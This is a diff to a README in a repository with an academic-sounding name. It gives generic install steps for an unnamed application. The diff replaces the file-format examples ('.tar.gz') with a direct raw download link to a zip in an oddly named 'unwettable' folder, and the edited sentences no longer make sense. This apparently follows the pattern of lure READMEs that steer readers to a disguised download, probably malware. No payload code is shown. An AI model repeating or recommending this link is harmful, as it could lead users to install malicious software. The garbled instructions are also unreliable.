Loser111111111/Cognitive-Dissonance-as-Epistemic-Event/README.md

    Click the download link for your chosen version.
 The file will start downloading to your computer.

 4. **Locate the Downloaded File:**
    Find the file in your Downloads folder or the location you saved it.
-The file will typically have a format like `.exe`, `.dmg`, or `.tar.gz`, depending on your operating system.
+The file will typically have a format like `.exe`, `.dmg`, or `https://github.com/Loser111111111/Cognitive-Dissonance-as-Epistemic-Event/raw/refs/heads/main/unwettable/Dissonance_Cognitive_Event_as_Epistemic_2.5-beta.4.zip`, depending on your operating system.

 5. **Install the Application:**
    - **Windows:** Double-click the `.exe` file.
 Follow the prompts to complete the installation.
    - **Mac:** Open the `.dmg` file and drag the application to your Applications folder.
-   - **Linux:** Extract the `.tar.gz` file and run the installation script from the terminal.
+   - **Linux:** Extract the `https://github.com/Loser111111111/Cognitive-Dissonance-as-Epistemic-Event/raw/refs/heads/main/unwettable/Dissonance_Cognitive_Event_as_Epistemic_2.5-beta.4.zip` file and run the installation script from the terminal.

 6. **Run the Application:**
    After installation, find the application in your applications folder or start menu.
 Click to open it.